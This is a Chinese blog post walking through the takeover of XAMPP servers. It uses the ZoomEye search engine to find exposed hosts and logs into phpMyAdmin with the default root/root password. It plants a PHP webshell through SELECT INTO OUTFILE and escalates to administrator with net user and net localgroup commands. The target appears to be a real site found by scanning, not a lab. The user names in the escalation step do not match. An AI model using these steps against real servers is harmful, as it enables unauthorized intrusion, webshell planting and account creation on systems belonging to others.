xampp默认配置拿shell

   

xampp默认配置拿shell

  首先我们先来科普一下xampp(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包 是一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动即可。 然后在安装xampp的过程中 很多网站管理员对于mysql数据库密码 都会直接 默认  所以 就照成了这个漏洞的产生

=20160407205536

好了 废话不多说 我们直接上神器钟馗之眼 server-status – server-info – phpmyadmin 账号密码: root/root port:80

\

  如图找到一个网站 进去 初始的phpinfo 箭头指的是phpmyadmin的登陆地址

\

我们记下网站根目录C:/Program Files (x86)/xampp/xampps/htdocs

\

  点进去之后我们输入 默认的用户名和密码 root root

20160407205625

20160407205906

  进去之后我们呢输入sql语句 select ‘php一句话’ into outfile ‘C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php’   写入一句话 

 2016040721002820160407210019

  菜刀连之  然后我们在说一下提权

20160409145505

20160409145519

  (1)首先输入命令添加用户:

  net user test01 Mgs?1234567890 /add

  (2)将普通用户加入到超级管理组administrators

  然后输入net localgroup administrators mgsrc1 /add 

(ps:在提权的时候 也走了很多弯路 这台服务器 的密码策略没关闭 所以 密码组合必须为一个大写字母 加一个符号然后加数字  而且 这台服务器 密码位数不能超过14位 不然就无响应)

20160409150837

 

文章转发地址:http://www.hackdig.com/04/hack-34524.htm

posted @ 2016-12-23 22:26  myles007  阅读(3767)  评论(0编辑  收藏  举报